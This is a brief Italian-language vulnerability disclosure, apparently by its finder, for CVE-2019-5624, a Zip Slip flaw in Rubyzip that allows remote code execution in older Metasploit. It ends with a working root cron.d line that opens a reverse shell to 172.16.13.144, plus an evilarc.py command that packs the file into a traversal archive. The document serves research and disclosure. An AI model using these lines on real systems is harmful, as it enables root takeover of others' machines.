
Una prova di concetto per la vulnerabilità CVE-2019-5624 di Metasploit (RCE tramite gestione non sicura dei file ZIP di Rubyzip)
Una prova di concetto per la vulnerabilità CVE-2019-5624 di Metasploit (RCE tramite gestione non sicura dei file ZIP in Rubyzip)
Nel febbraio 2019 ho trovato una nuova vulnerabilità nella libreria Rubyzip. Consente a un attaccante di sfruttare una gestione non sicura dei file ZIP (Zip Slip) che porta all'esecuzione remota di comandi.
Questa vulnerabilità è stata sfruttata per colpire tutte le versioni di Metasploit < 5.0.18 Metasploit Wrap-Up
Ho scritto un dettagliato post sul blog che spiega la vulnerabilità.
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
python evilarc.py exploit --os unix -p etc/cron.d/